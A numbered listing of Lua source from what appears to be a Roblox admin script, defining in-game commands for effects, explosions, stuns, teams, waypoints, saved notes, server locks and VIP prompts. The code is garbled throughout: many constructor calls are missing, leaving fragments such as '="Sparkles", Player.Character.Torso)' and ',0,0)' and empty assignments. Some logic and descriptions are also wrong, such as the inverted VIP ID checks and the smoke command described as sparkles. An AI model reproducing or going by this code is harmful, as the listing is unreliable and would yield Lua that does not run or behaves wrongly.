  7704. [{"permcommandbar", "permcmdbar", "permcommandgui", "permcmdgui"}] = {"", "Gives you a command bar for each time you spawn", 0, "Admin", false, function(Speaker, Rank, Arguments)
  7705. GUI:CommandBar(Speaker)
  7706. PermCommandBars[Speaker.Name] = true
  7707. end};
  7709. [{"nopermcommandbar", "nopermcmdbar", "nopermcommandgui", "nopermcmdgui", "unpermcommandbar", "unpermcmdbar", "unpermcommandgui", "unpermcmdgui"}] = {"", "If you are in the perm command bar list, it takes you out(You keep command bar for current spawn)", 0, "Admin", false, function(Speaker, Rank, Arguments)
  7710. PermCommandBars[Speaker.Name] = nil
  7711. end};
  7713. [{"remotenopermcommandbar", "remotenopermcmdbar", "remotenopermcommandgui", "remotenopermcmdgui", "remoteunpermcommandbar", "remoteunpermcmdbar", "remoteunpermcommandgui", "remoteunpermcmdgui"}] = {"player", "If player is in the perm command bar list, it takes player out(player keep command bar for current spawn)", 1, "Owner", false, function(Speaker, Rank, Arguments)
  7714. local Players = STRING:Scan(Arguments[1], Speaker)
  7715. for _,Player in pairs(Players) do
  7716. PermCommandBars[Player.Name] = nil
  7717. end
  7718. end};
  7720. [{"dummy", "newdummy", "dum", "figure"}] = {"", "Creates a dummy", 0, "Member", false, function(Speaker, Rank, Arguments)
  7721. CORE:CreateFigure("Dummy", nil, true, Speaker)
  7722. end};
  7724. [{"namedummy", "dummyname", "namenewdummy", "namedum", "dumname", "namefigure", "ndummy", "nnewdummy", "ndum", "nfigure"}] = {"string", "Creates a dummy named string", 1, "Member", false, function(Speaker, Rank, Arguments)
  7725. CORE:CreateFigure(Arguments[1], nil, true, Speaker)
  7726. end};
  7728. [{"clone", "copy"}] = {"player", "Creates clone of player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7729. local Players = STRING:Scan(Arguments[1], Speaker)
  7730. for _,Player in pairs(Players) do
  7731. CORE:ClonePlayer(Player)
  7732. end
  7733. end};
  7735. [{"nameclone", "clonename", "namecopy", "nclone", "ncopy"}] = {"player string", "Creates clone of player named string", 2, "Member", false, function(Speaker, Rank, Arguments)
  7736. local Players = STRING:Scan(Arguments[1], Speaker)
  7737. for _,Player in pairs(Players) do
  7738. CORE:ClonePlayer(Player, Arguments[2])
  7739. end
  7740. end};
  7742. [{"clear", "clr"}] = {"", "Clears debris in workspace left by the admin", 0, "Member", false, function(Speaker, Rank, Arguments)
  7743. for _,Obj in pairs(Objects) do
  7744. if Obj then Obj:Destroy() end
  7745. end
  7746. for Name,Jail in pairs(Jails) do
  7747. if not game.Players:FindFirstChild(Name) then
  7748. Jail:Destroy()
  7749. Jails[Name] = nil
  7750. end
  7751. end
  7752. Objects = {}
  7753. end};
  7755. [{"clean", "cln"}] = {"", "Clears debris in workspace by players", 0, "Member", false, function(Speaker, Rank, Arguments)
  7756. for _,Obj in pairs(Server.Workspace:GetChildren()) do
  7757. if Obj:IsA("Accoutrement") or Obj:IsA("Tool") then
  7758. Obj:Destroy()
  7759. end
  7760. end
  7761. end};
  7763. [{"sparkles", "sparks"}] = {"player", "Adds a sparkling effect to player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7764. local Players = STRING:Scan(Arguments[1], Speaker)
  7765. for _,Player in pairs(Players) do
  7766. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7767. local Sparkles ="Sparkles", Player.Character.Torso) table.insert(Objects, Sparkles)
  7768. end
  7769. end
  7770. end};
  7772. [{"fire"}] = {"player", "Makes player catch on fire", 1, "Member", false, function(Speaker, Rank, Arguments)
  7773. local Players = STRING:Scan(Arguments[1], Speaker)
  7774. for _,Player in pairs(Players) do
  7775. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7776. local Fire ="Fire", Player.Character.Torso) table.insert(Objects, Fire)
  7777. end
  7778. end
  7779. end};
  7781. [{"smoke"}] = {"player", "Adds a sparkling effect to player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7782. local Players = STRING:Scan(Arguments[1], Speaker)
  7783. for _,Player in pairs(Players) do
  7784. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7785. local Smoke ="Smoke", Player.Character.Torso) table.insert(Objects, Smoke)
  7786. end
  7787. end
  7788. end};
  7790. [{"nosparkles", "nosparks", "unsparkles", "unsparks"}] = {"player", "Removes any sparkling effects to player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7791. local Players = STRING:Scan(Arguments[1], Speaker)
  7792. for _,Player in pairs(Players) do
  7793. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7794. for _,Get in pairs(Player.Character.Torso:GetChildren()) do
  7795. if Get:IsA("Sparkles") then
  7796. Get:Destroy()
  7797. end
  7798. end
  7799. end
  7800. end
  7801. end};
  7803. [{"nofire", "unfire"}] = {"player", "Removes player's fire effects", 1, "Member", false, function(Speaker, Rank, Arguments)
  7804. local Players = STRING:Scan(Arguments[1], Speaker)
  7805. for _,Player in pairs(Players) do
  7806. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7807. for _,Get in pairs(Player.Character.Torso:GetChildren()) do
  7808. if Get:IsA("Fire") then
  7809. Get:Destroy()
  7810. end
  7811. end
  7812. end
  7813. end
  7814. end};
  7816. [{"nosmoke", "unsmoke"}] = {"player", "Removes player's smoke effects", 1, "Member", false, function(Speaker, Rank, Arguments)
  7817. local Players = STRING:Scan(Arguments[1], Speaker)
  7818. for _,Player in pairs(Players) do
  7819. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7820. for _,Get in pairs(Player.Character.Torso:GetChildren()) do
  7821. if Get:IsA("Smoke") then
  7822. Get:Destroy()
  7823. end
  7824. end
  7825. end
  7826. end
  7827. end};
  7829. [{"explode", "explosion"}] = {"player", "Explodes player and everything around player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7830. local Players = STRING:Scan(Arguments[1], Speaker)
  7831. for _,Player in pairs(Players) do
  7832. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7833. SOUND:MakeSound(Player.Character.Torso, 187137543, 1, 1, false):Play()
  7834. local Boom ="Explosion", Workspace)
  7835. Boom.Position = Player.Character.Torso.Position
  7836. end
  7837. end
  7838. end};
  7840. [{"splode", "smite"}] = {"player", "Explodes player 50 times and everything around player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7841. local Players = STRING:Scan(Arguments[1], Speaker)
  7842. for _,Player in pairs(Players) do
  7843. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7844. coroutine.wrap(function() for i = 1,50 do
  7845. local Boom ="Explosion", Workspace)
  7846. Boom.Position = Player.Character.Torso.Position
  7847. wait()
  7848. end end)()
  7849. coroutine.wrap(function() for i = 1,5 do
  7850. SOUND:MakeSound(Player.Character.Torso, 187137543, 1, 1, false):Play()
  7851. end end)()
  7852. end
  7853. end
  7854. end};
  7856. [{"superjump", "nograv", "lowgrav"}] = {"player", "Enables player to be able to jump super high", 1, "Member", false, function(Speaker, Rank, Arguments)
  7857. local Players = STRING:Scan(Arguments[1], Speaker)
  7858. for _,Player in pairs(Players) do
  7859. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7860. local Force = Player.Character.Torso:FindFirstChild("LMM SJ") if Force then Force:Destroy() end
  7861. Force ="BodyForce", Player.Character.Torso) Force.Name = "LMM SJ" Force.force =,0,0)
  7862. CORE:ScanItems(Player.Character, {"BasePart"}, function(Obj) Force.force = Force.force +,Obj:GetMass() * 150,0) end)
  7863. end
  7864. end
  7865. end};
  7867. [{"normaljump", "grav", "nosuperjump", "unsuperjump"}] = {"player", "Disables player to be able to jump super high", 1, "Member", false, function(Speaker, Rank, Arguments)
  7868. local Players = STRING:Scan(Arguments[1], Speaker)
  7869. for _,Player in pairs(Players) do
  7870. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7871. local Force = Player.Character.Torso:FindFirstChild("LMM SJ") if Force then Force:Destroy() end
  7872. end
  7873. end
  7874. end};
  7876. [{"punish"}] = {"player", "Punishes player by removing player's character", 1, "Member", false, function(Speaker, Rank, Arguments)
  7877. local Players = STRING:Scan(Arguments[1], Speaker)
  7878. for _,Player in pairs(Players) do
  7879. if Player.Character then
  7880. Player.Character.Parent = Server.Lighting
  7881. end
  7882. end
  7883. end};
  7885. [{"nopunish", "unpunish"}] = {"player", "Undoes the punish effect on player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7886. local Players = STRING:Scan(Arguments[1], Speaker)
  7887. for _,Player in pairs(Players) do
  7888. if Player.Character then
  7889. Player.Character.Parent = Server.Workspace
  7890. Player.Character:MakeJoints()
  7891. end
  7892. end
  7893. end};
  7895. [{"stun", "platformstand"}] = {"player", "Stuns player so he cannot move", 1, "Member", false, function(Speaker, Rank, Arguments)
  7896. local Players = STRING:Scan(Arguments[1], Speaker)
  7897. for _,Player in pairs(Players) do
  7898. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  7899. Player.Character.Humanoid.PlatformStand = true
  7900. end
  7901. end
  7902. end};
  7904. [{"nostun", "unstun", "noplatformstand", "unplatformstand", "stand"}] = {"player", "Undoes the stun effect on player", 1, "Member", false, function(Speaker, Rank, Arguments)
  7905. local Players = STRING:Scan(Arguments[1], Speaker)
  7906. for _,Player in pairs(Players) do
  7907. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  7908. Player.Character.Humanoid.PlatformStand = false
  7909. end
  7910. end
  7911. end};
  7913. [{"jump"}] = {"player", "Makes player jump", 1, "Member", false, function(Speaker, Rank, Arguments)
  7914. local Players = STRING:Scan(Arguments[1], Speaker)
  7915. for _,Player in pairs(Players) do
  7916. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  7917. Player.Character.Humanoid.Jump = true
  7918. end
  7919. end
  7920. end};
  7922. [{"sit", "sitdown"}] = {"player", "Makes player sit down", 1, "Member", false, function(Speaker, Rank, Arguments)
  7923. local Players = STRING:Scan(Arguments[1], Speaker)
  7924. for _,Player in pairs(Players) do
  7925. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  7926. Player.Character.Humanoid.Sit = true
  7927. end
  7928. end
  7929. end};
  7931. [{"nosit", "unsit", "nositdown", "unsitdown", "stand", "standup"}] = {"player", "Makes player stand up if sitting down", 1, "Member", false, function(Speaker, Rank, Arguments)
  7932. local Players = STRING:Scan(Arguments[1], Speaker)
  7933. for _,Player in pairs(Players) do
  7934. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  7935. Player.Character.Humanoid.Sit = false
  7936. end
  7937. end
  7938. end};
  7940. [{"spin", "turn", "spinaround"}] = {"player", "Makes player spin around", 1, "Member", false, function(Speaker, Rank, Arguments)
  7941. local Players = STRING:Scan(Arguments[1], Speaker)
  7942. for _,Player in pairs(Players) do
  7943. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7944. local Spin ="BodyAngularVelocity", Player.Character.Torso) Spin.Name = "MML Spin" Spin.maxTorque =, math.huge, 0) Spin.angularvelocity =,20,0)
  7945. end
  7946. end
  7947. end};
  7949. [{"nospin", "unspin", "noturn", "unturn", "nospinaround", "unspinaround"}] = {"player", "Stops player from spinning around", 1, "Member", false, function(Speaker, Rank, Arguments)
  7950. local Players = STRING:Scan(Arguments[1], Speaker)
  7951. for _,Player in pairs(Players) do
  7952. if Player.Character and Player.Character:FindFirstChild("Torso") then
  7953. local Spin = Player.Character.Torso:FindFirstChild("MML Spin") if Spin then Spin:Destroy() end
  7954. end
  7955. end
  7956. end};
  7958. [{"port"}] = {"", "Gets the server network port", 0, "Owner", false, function(Speaker, Rank, Arguments)
  7959. GUI:SendMessage(Speaker, "Server Port", "The server port for this server is: "..Server.NS.Port, "Information")
  7960. end};
  7962. [{"chat"}] = {"player (color) string", "Makes player chat string. If color is available the color will be set to it", 2, "Member", false, function(Speaker, Rank, Arguments)
  7963. local Color = "Blue"
  7964. local String = Arguments[2]
  7965. local ChatSplit = STRING:GetSplit(String, 1, Settings.Bet)
  7966. if #ChatSplit >= 2 then
  7967. if string.lower(ChatSplit[1]) == "green" then
  7968. Color = "Green"
  7969. String = ChatSplit[2]
  7970. elseif string.lower(ChatSplit[1]) == "red" then
  7971. Color = "Red"
  7972. String = ChatSplit[2]
  7973. end
  7974. end
  7975. local Players = STRING:Scan(Arguments[1], Speaker)
  7976. for _,Player in pairs(Players) do
  7977. if Player.Character and Player.Character:FindFirstChild("Head") then
  7978. game:GetService("Chat"):Chat(Player.Character.Head, STRING:DetermineFilter(String, Speaker, Player), Color)
  7979. end
  7980. end
  7981. end};
  7983. [{"missile", "mis", "rocket"}] = {"player", "Turns player into a missile. Use with care!", 1, "Admin", true, function(Speaker, Rank, Arguments)
  7984. local Players = STRING:Scan(Arguments[1], Speaker)
  7985. for _,Player in pairs(Players) do
  7986. if Player.Character then
  7987. CORE:ExecuteResource("Missile", Player.Character, {["Color"] = GUI:GetColor()})
  7988. end
  7989. end
  7990. end};
  7992. [{"face"}] = {"player num(ID)", "Changes player's faces player num(ID) (must be decal/image)", 2, "Member", false, function(Speaker, Rank, Arguments)
  7993. local Players = STRING:Scan(Arguments[1], Speaker)
  7994. local ID = nil
  7995. if tonumber(Arguments[2]) ~= nil then
  7996. ID = MARKET:GetImageFormat(tonumber(Arguments[2]))
  7997. else
  7998. for FaceTable,FaceID in pairs({[{":3", "=3", ";3"}] = "45448697", [{":D", "=D", ";D"}] = "40528907", [{"D:", "D=", "D;"}] = "147285493", [{":(", "=(", ";(", "):", ")=", ");"}] = "67493660", [{":)", "=)", ";)", "(:", "(=", "(;"}] = "41420967", [{":o", "=o", ";o", "o:", "o=", "o;", ":0", "=0", ";0", "0:", "0=", "0;"}] = "14995229", [{":P", "=P", ";P"}] = "35853859", [{":/", "=/", ";/", "/:", "/=", "/;", [[:\]], [[=\]], [[;\]], [[\:]], [[\=]], [[\;]]}] = "141764028", [{":I", "=I", ";I", "I:", "I=", "I;", ":|", "=|", ";|", "|:", "|=", "|;"}] = "14922431"}) do
  7999. for _,Face in pairs(FaceTable) do
  8000. if string.lower(Arguments[2]) == string.lower(Face) then
  8001. ID = FaceID
  8002. break
  8003. end
  8004. end
  8005. end
  8006. end
  8007. if ID then
  8008. for _,Player in pairs(Players) do
  8009. if Player.Character and Player.Character:FindFirstChild("Head") and Player.Character.Head:FindFirstChild("face") then
  8010. Player.Character.Head.face.Texture = "rbxassetid://"..ID
  8011. pcall(function() Player.Character.Label:GetChildren()[1].Head.Texture = "rbxassetid://"..ID end)
  8012. end
  8013. end
  8014. end
  8015. end};
  8017. [{"overlay", "ol"}] = {"player num(ID)", "Turns player's head into a 2D images of num(ID)", 2, "Member", false, function(Speaker, Rank, Arguments)
  8018. local Players = STRING:Scan(Arguments[1], Speaker)
  8019. local ID = MARKET:GetImageFormat(tonumber(Arguments[2]))
  8020. for _,Player in pairs(Players) do
  8021. if Player.Character and Player.Character:FindFirstChild("Head") then
  8022. local BB = Player.Character.Head:FindFirstChild("MMLA Overlay") if BB then BB:Destroy() end
  8023. BB ="BillboardGui", Player.Character.Head) BB.Name = "MMLA Overlay" BB.AlwaysOnTop = true BB.Size =,0,1,0) BB.Adornee = Player.Character.Head
  8024. local Image ="ImageLabel", BB) Image.BackgroundTransparency = 1 Image.Image = "rbxassetid://"..ID Image.Position =,0,-0.5,0) Image.Size =,0,2,0)
  8025. end
  8026. end
  8027. end};
  8029. [{"nooverlay", "unoverlay", "nool", "unol"}] = {"player", "Removes any overlay on player's head from the overlay command", 1, "Member", false, function(Speaker, Rank, Arguments)
  8030. local Players = STRING:Scan(Arguments[1], Speaker)
  8031. for _,Player in pairs(Players) do
  8032. if Player.Character and Player.Character:FindFirstChild("Head") then
  8033. local BB = Player.Character.Head:FindFirstChild("MMLA Overlay") if BB then BB:Destroy() end
  8034. end
  8035. end
  8036. end};
  8038. [{"notify"}] = {"string", "Sends string as a packet to the owner remotely", 1, "Admin", false, function(Speaker, Rank, Arguments)
  8039. REMOTE:SendHttpLog(Speaker.Name.." Sent Notification: "..Arguments[1], "NOTIFICATION", Speaker)
  8040. end, Http = true};
  8042. [{"downloadlogs", "downloadhttplogs", "getlogs", "gethttplogs"}] = {"", "Downloads http logs sent by all admins using RemoteAdmin with a DataKey from the Linked Account", 0, "Admin", false, function(Speaker, Rank, Arguments)
  8043. GUI:ListGui(Speaker, "Http Logs", CORE:ReverseTable(REMOTE:DownloadUserdata(false).Logs), "Log")
  8044. end, Http = true};
  8046. [{"note"}] = {"player string", "Saves string to player to all servers", 2, "Admin", false, function(Speaker, Rank, Arguments)
  8047. local Players = STRING:Scan(Arguments[1], Speaker)
  8048. for _,Player in pairs(Players) do
  8049. local ExistingData = Player:LoadInstance("Data")
  8050. if ExistingData == nil then
  8051. ExistingData ="Configuration")
  8052. end
  8053. ExistingData.Name = "Player Data"
  8054. local Key ="Configuration", ExistingData)
  8055. Key.Name = Arguments[2]
  8056. Player:SaveInstance("Data", ExistingData)
  8057. end
  8058. end};
  8060. [{"removenote", "noteremove"}] = {"player string", "Removes any note starting with string", 2, "Admin", false, function(Speaker, Rank, Arguments)
  8061. local Players = STRING:Scan(Arguments[1], Speaker)
  8062. local Data = Arguments[2]
  8063. for _,Player in pairs(Players) do
  8064. local ExistingData = Player:LoadInstance("Data")
  8065. if ExistingData ~= nil then
  8066. if string.lower(Data) == "all" then
  8067. ExistingData:ClearAllChildren()
  8068. else
  8069. for _,DataObj in pairs(ExistingData:GetChildren()) do
  8070. if string.sub(string.lower(DataObj.Name),1,#Data) == string.lower(Data) then
  8071. DataObj:Destroy()
  8072. end
  8073. end
  8074. end
  8075. end
  8076. Player:SaveInstance("Data", ExistingData)
  8077. end
  8078. end};
  8080. [{"shownotes", "shownote", "loadnotes", "loadnote", "notes", "getnotes", "getnote"}] = {"player", "Shows the saved notes of player", 1, "Member", false, function(Speaker, Rank, Arguments)
  8081. local Players = STRING:Scan(Arguments[1], Speaker)
  8082. local DataSet = {}
  8083. for _,Player in pairs(Players) do
  8084. local ExistingData = Player:LoadInstance("Data")
  8085. if ExistingData ~= nil then
  8086. if #ExistingData:GetChildren() ~= 0 then
  8087. for _,Data in pairs(ExistingData:GetChildren()) do
  8088. table.insert(DataSet, Player.Name..": "..Data.Name)
  8089. end
  8090. else
  8091. table.insert(DataSet, "Data does not exist for "..Player.Name)
  8092. end
  8093. else
  8094. table.insert(DataSet, "Data does not exist for "..Player.Name)
  8095. end
  8096. end
  8097. GUI:ListGui(Speaker, "Notes", DataSet)
  8098. end};
  8100. [{"forwards", "forward"}] = {"player", "Makes player walk forward at normal walkspeed", 1, "Member", false, function(Speaker, Rank, Arguments)
  8101. local Players = STRING:Scan(Arguments[1], Speaker)
  8102. for _,Player in pairs(Players) do
  8103. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  8104. Player.Character.Humanoid.WalkSpeed = 16
  8105. end
  8106. end
  8107. end};
  8109. [{"backwards", "backward"}] = {"player", "Makes player walk backwards(reverse keys) at normal walkspeed", 1, "Member", true, function(Speaker, Rank, Arguments)
  8110. local Players = STRING:Scan(Arguments[1], Speaker)
  8111. for _,Player in pairs(Players) do
  8112. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  8113. Player.Character.Humanoid.WalkSpeed = -16
  8114. end
  8115. end
  8116. end};
  8118. [{"teamnew", "teamcreate", "newteam", "createteam"}] = {"string", "Creates a new team named string. If a color is detected, the team color will be set to it.", 1, "Member", false, function(Speaker, Rank, Arguments)
  8119. local TeamColor = BrickColor.random()
  8120. local TeamName = Arguments[1]
  8121. local TeamNameSplit = STRING:GetSplit(TeamName, 1, " ")
  8122. if #TeamNameSplit >= 2 then
  8123. local Color = TeamNameSplit[1]
  8124. local NewTeamName = TeamNameSplit[2]
  8125. if Color == "Medium stone grey" then
  8126. TeamColor =
  8127. TeamName = NewTeamName
  8128. elseif ~="Medium stone grey") then
  8129. TeamColor =
  8130. TeamName = NewTeamName
  8131. elseif Colors[string.upper(Color)] then
  8132. TeamColor =
  8133. TeamName = NewTeamName
  8134. end
  8135. end
  8137. local NewTeam ="Team", Server.Teams)
  8138. NewTeam.TeamColor = TeamColor
  8139. NewTeam.Name = TeamName
  8140. end};
  8142. [{"leaveteam", "teamleave"}] = {"player", "Makes player be on no team", 1, "Member", false, function(Speaker, Rank, Arguments)
  8143. local Players = STRING:Scan(Arguments[1], Speaker)
  8144. for _,Player in pairs(Players) do
  8145. Player.Neutral = true
  8146. end
  8147. end};
  8149. [{"team", "teamjoin", "jointeam"}] = {"player string", "Makes it so player joints team string", 2, "Member", false, function(Speaker, Rank, Arguments)
  8150. local Players = STRING:Scan(Arguments[1], Speaker)
  8151. if string.lower(Arguments[2]) == "none" then
  8152. for _,Player in pairs(Players) do
  8153. Player.Neutral = true
  8154. end
  8155. else
  8156. for _,Obj in pairs(Server.Teams:GetChildren()) do
  8157. if Obj:IsA("Team") then
  8158. if string.sub(string.lower(Obj.Name),1,#Arguments[2]) == string.lower(Arguments[2]) then
  8159. for _,Player in pairs(Players) do
  8160. Player.Neutral = false
  8161. Player.TeamColor = Obj.TeamColor
  8162. end
  8163. end
  8164. end
  8165. end
  8166. end
  8167. end};
  8169. [{"noteam", "unteam", "nonewteam", "unnewteam"}] = {"string", "Finds the team named string and removes it", 1, "Member", false, function(Speaker, Rank, Arguments)
  8170. for _,Obj in pairs(Server.Teams:GetChildren()) do
  8171. if Obj:IsA("Team") then
  8172. if string.sub(string.lower(Obj.Name),1,#Arguments[1]) == string.lower(Arguments[1]) then
  8173. for _,Player in pairs(Server.Players:GetPlayers()) do
  8174. if Player.TeamColor == Obj.TeamColor then
  8175. Player.Neutral = true
  8176. end
  8177. end
  8178. Obj:Destroy()
  8179. end
  8180. end
  8181. end
  8182. end};
  8184. [{"clearteams", "cleanteams"}] = {"", "Clears all teams", 0, "Member", false, function(Speaker, Rank, Arguments)
  8185. for _,Player in pairs(Server.Players:GetPlayers()) do
  8186. Player.Neutral = true
  8187. end
  8188. for _,Obj in pairs(Server.Teams:GetChildren()) do
  8189. if Obj:IsA("Team") then
  8190. Obj:Destroy()
  8191. end
  8192. end
  8193. end};
  8195. [{"countdown", "count", "ticker"}] = {"num", "Counts down an alarm from num", 1, "Member", false, function(Speaker, Rank, Arguments)
  8196. for _,Player in pairs(Server.Players:GetPlayers()) do
  8197. GUI:Countdown(Player, Arguments[1])
  8198. end
  8199. end};
  8201. [{"showad", "ad"}] = {"player", "Shows an ad to player(As of now, only people on mobile devices can see)", 1, "Admin", false, function(Speaker, Rank, Arguments)
  8202. local Players = STRING:Scan(Arguments[1], Speaker)
  8203. for _,Player in pairs(Players) do
  8204. if Player:FindFirstChild("Backpack") then
  8205. CORE:ExecuteResource("ShowAd", Player.Backpack)
  8206. end
  8207. end
  8208. end};
  8210. [{"warp", "warpto"}] = {"player string", "Warps player to the point of string", 2, "Member", false, function(Speaker, Rank, Arguments)
  8211. local Players = STRING:Scan(Arguments[1], Speaker)
  8212. for _,Player in pairs(Players) do
  8213. if Player.Character then
  8214. for PosName,WP in pairs(Waypoints) do
  8215. if string.sub(string.lower(PosName),1,#Arguments[2]) == string.lower(Arguments[2]) then
  8216. Player.Character:MoveTo(WP +,0.5,0))
  8217. break
  8218. end
  8219. end
  8220. end
  8221. end
  8222. end};
  8224. [{"waypoint", "addwaypoint"}] = {"string num(X) num(Y) num(Z)", "Adds a waypoint to warp named string with the XYZ coordinates", 4, "Admin", false, function(Speaker, Rank, Arguments)
  8225. CORE:AddWaypoint(Arguments[1],[2], Arguments[3], Arguments[4]), Speaker)
  8226. end};
  8228. [{"removewaypoint", "deletewaypoint", "destroywaypoint", "nowaypoint", "unwaypoint"}] = {"string", "Removes any waypoint named string", 1, "Member", false, function(Speaker, Rank, Arguments)
  8229. local Num = 0
  8230. for PosName,WP in pairs(Waypoints) do
  8231. Num = Num + 1
  8232. if string.sub(string.lower(PosName),1,#Arguments[1]) == Arguments[1] then
  8233. Waypoints[PosName] = nil
  8234. end
  8235. end
  8236. end};
  8238. [{"waypoints", "viewwaypoints", "waypointlist", "listwaypoints"}] = {"", "Views all waypoints to warp to", 0, "Member", false, function(Speaker, Rank, Arguments)
  8239. local WaypointHolder,WaypointRaw = {},{}
  8240. for Name, WP in pairs(Waypoints) do
  8241. local View = Name..": "..tostring(WP)
  8242. table.insert(WaypointHolder, View)
  8243. WaypointRaw[View] = WP
  8244. end
  8245. local Clicked = GUI:ListGui(Speaker, "Waypoint List", WaypointHolder, "Map")
  8246. Clicked.Event:connect(function(Text)
  8247. local Waypoint = WaypointRaw[Text]
  8248. if Waypoint then
  8249. if Speaker.Character then
  8250. Speaker.Character:MoveTo(Waypoint)
  8251. end
  8252. end
  8253. end)
  8254. end};
  8256. [{"list", "listplayer", "listplayers"}] = {"player", "Lists the player(s) in a gui list", 1, "Member", false, function(Speaker, Rank, Arguments)
  8257. local Players = STRING:Scan(Arguments[1], Speaker)
  8258. local List = {}
  8259. for _,Player in pairs(Players) do
  8260. table.insert(List, Player.Name.." (ID: "..Player.UserId..")")
  8261. end
  8262. GUI:ListGui(Speaker, "Listed Players", List)
  8263. end};
  8265. [{"givepoints"}] = {"player num", "Gives num playerpoints to player", 2, "Owner", false, function(Speaker, Rank, Arguments)
  8266. if tonumber(Arguments[1]) then
  8267. ypcall(function() Server.PS:AwardPoints(tonumber(Arguments[1]), tonumber(Arguments[2])) end)
  8268. else
  8269. local Players = STRING:Scan(Arguments[1], Speaker)
  8270. for _,Player in pairs(Players) do
  8271. ypcall(function() Server.PS:AwardPoints(Player.UserId, tonumber(Arguments[2])) end)
  8272. end
  8273. end
  8274. end};
  8276. [{"friends", "getfriends", "listfriends", "showfriends"}] = {"player", "Shows all the friends player is friends with in the server", 1, "Member", false, function(Speaker, Rank, Arguments)
  8277. local Players = STRING:Scan(Arguments[1], Speaker)
  8278. local Friends,OneFriend = {}, false
  8279. for _,Player in pairs(Players) do
  8280. for _,User in pairs(Server.Players:GetPlayers()) do if User ~= Player then
  8281. --[[if Player:IsBestFriendsWith(User.UserId) then
  8282. table.insert(Friends, Player.Name.." is best friends with "..User.Name)
  8283. OneFriend = true
  8284. ]]
  8285. if Player:IsFriendsWith(User.UserId) then
  8286. table.insert(Friends, Player.Name.." is friends with "..User.Name)
  8287. OneFriend = true
  8288. end
  8289. if _ == #Server.Players:GetPlayers() and OneFriend == false then
  8290. table.insert(Friends, Player.Name.." has no friends in this server (Loner)")
  8291. end
  8292. end end
  8293. end
  8294. GUI:ListGui(Speaker, "Friend List", Friends)
  8295. end};
  8297. [{"serverlock", "lockserver"}] = {"", "Locks the server to prevent non-admins from joining", 0, "Owner", false, function(Speaker, Rank, Arguments)
  8298. Settings.ServerLocked = true
  8299. GUI:MessageAdmins("Server Locked", "The server has been locked. Only admins can join at this point.", 10, "Lock")
  8300. end};
  8302. [{"noserverlock", "unserverlock", "unlockserver", "nolockserver", "nolock", "unlock"}] = {"", "Unlocks the server to enable non-admin joining", 0, "Owner", false, function(Speaker, Rank, Arguments)
  8303. Settings.ServerLocked = false
  8304. GUI:MessageAdmins("Server Unlocked", "The server has been unlocked. Anyone not banned or crashed can join", 10, 11344402)
  8305. end};
  8307. [{"minage", "minimumage", "restrictage"}] = {" num", "Restricts any player that is younger than the age(in days) num from joining", 0, "Owner", false, function(Speaker, Rank, Arguments)
  8308. local OldAge = Settings.MinimumAge
  8309. local Age = tostring(Arguments[1])
  8310. if Age then
  8311. Settings.MinimumAge = Age
  8312. GUI:MessageAdmins("Minumum age change", "The minimum age required to join this server is now "..Age.." days old(was "..OldAge.." days old)", 10)
  8313. end
  8314. end};
  8316. [{"vipadmin", "adminvip"}] = {"", "Prompts speaker the VIP item to grant Admin level permissions", 0, "Non-Admin", false, function(Speaker, Rank, Arguments)
  8317. if Settings.VIPAdminID <= 1 then
  8318. MARKET:PromptPurchase(Speaker, VIPAdminID)
  8319. else
  8320. CORE:SendMessage(Speaker, "No Admin VIP", "The creator ("..GameOwner..") did not add a admin rank VIP to Make".."rModelLua's Admin", 7)
  8321. end
  8322. end};
  8324. [{"vipmember", "membervip"}] = {"", "Prompts speaker the VIP item to grant Member level permissions", 0, "Non-Admin", false, function(Speaker, Rank, Arguments)
  8325. if Settings.VIPMemberID <= 1 then
  8326. MARKET:PromptPurchase(Speaker, VIPMemberID)
  8327. else
  8328. CORE:SendMessage(Speaker, "No Member VIP", "The creator ("..GameOwner..") did not add a member rank VIP to Make".."rModelLua's Admin", 7)
  8329. end
  8330. end};
  8332. [{"headsize", "sizehead", "resizehead", "headresize"}] = {"player num", "Resizes player's head to num. 100 = normal size 200 = double size 50 = half size", 2, "Member", true, function(Speaker, Rank, Arguments)
  8333. if tonumber(Arguments[2]) then
  8334. local Players = STRING:Scan(Arguments[1], Speaker)
  8335. local Size = tonumber(Arguments[2])+25
  8336. for _,Player in pairs(Players) do
  8337. if Player.Character then
  8338. if Player.Character:FindFirstChild("Head") then
  8339. if Player.Character.Head:FindFirstChild("Mesh") then
  8340. Player.Character.Head.Mesh.Scale =,Size/100,Size/100)
  8341. end
  8342. end
  8343. end
  8344. end
  8345. end
  8346. end};
  8348. [{"control"}] = {"player", "Allows speaker to take control of player", 1, "Member", false, function(Speaker, Rank, Arguments)
  8349. local Players = STRING:Scan(Arguments[1], Speaker)
  8350. for _,Player in pairs(Players) do
  8351. if Player.Character and Player.Character:FindFirstChild("Torso") then
  8352. CORE:ChangeCharacter(Speaker, Player.UserId, false, Speaker, true, Player.Character.Torso.Position)
  8353. Player.Character.Parent = nil
  8354. CORE:ExecuteResource("CameraControl", Player.Backpack, {["Speaker"] = Speaker})
  8355. end
  8356. end
  8357. end};
  8359. [{"settings"}] = {"", "Shows settings to speaker. If high enough rank, the speaker can edit settings", 0, "Non-Admin", false, function(Speaker, Rank, Arguments)
  8360. GUI:SettingsGui(Speaker)
  8361. end};
